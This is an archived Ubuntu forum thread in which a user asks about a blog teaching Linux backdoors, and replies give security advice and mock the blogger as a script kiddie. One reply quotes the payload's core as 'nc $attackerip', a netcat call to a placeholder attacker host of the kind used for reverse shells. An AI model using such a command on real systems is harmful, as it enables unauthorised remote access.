PDA

View Full Version : Linux Hacker on twitter



ken631
November 18th, 2011, 03:57 PM
I had no idea where to put this.

On Twitter this guy NefritLk decided to follow me. I have no idea who this guy is so I checked out his profile and his wordpress blog and I found what I think is hacking information for linux.

http://theonemarch.wordpress.com/

Hacking is not a crime its an art so is the title of his webpage. Shows you how to create a "backdoor" to a "victom" machine.

Any need for concern?

haqking
November 18th, 2011, 04:02 PM
I had no idea where to put this.

On Twitter this guy NefritLk decided to follow me. I have no idea who this guy is so I checked out his profile and his wordpress blog and I found what I think is hacking information for linux.

http://theonemarch.wordpress.com/

Hacking is not a crime its an art so is the title of his webpage. Shows you how to create a "backdoor" to a "victom" machine.

Any need for concern?

concern about what ? that there are malicious people out there ? of course there is.

What is your concern ? that he is following you on twitter ? well that is a social network given, make sure his/her name is not Robin Sage though ;-) (you may not get that reference though.)

Dont click on links from people you dont trust, dont accept files from them, dont visit their sites (wordpress)

And Hacking is not a crime, cracking often is (cracking is malicious hacking) there is also ethical hacking (done with consent in the confines of a legal agreement)

What exaclty is your specific concern ?

See here for some basic Linux/Ubuntu Security answers https://wiki.ubuntu.com/BasicSecurity

Dangertux
November 18th, 2011, 04:06 PM
I had no idea where to put this.

On Twitter this guy NefritLk decided to follow me. I have no idea who this guy is so I checked out his profile and his wordpress blog and I found what I think is hacking information for linux.

http://theonemarch.wordpress.com/

Hacking is not a crime its an art so is the title of his webpage. Shows you how to create a "backdoor" to a "victom" machine.

Any need for concern?

No. In fact I'd go so far as to say script kiddie, for the following reasons.

-- Silly little anonymous favicon (automatically like minus 10 points right there)
-- No encoding on the shellcode. (and for heaven's sake USE METERPRETER, it works in Linux since last year)
-- l337 speak in username (more skiddie garbage)
-- The big kicker... Wait for it... He uses metasploit to compile a payload into an executable that essentially does nothing but this



nc $attackerip
So...yeah I wouldn't worry.

oldos2er
November 18th, 2011, 07:07 PM
Not an Ubuntu support question; moved to Community Cafe.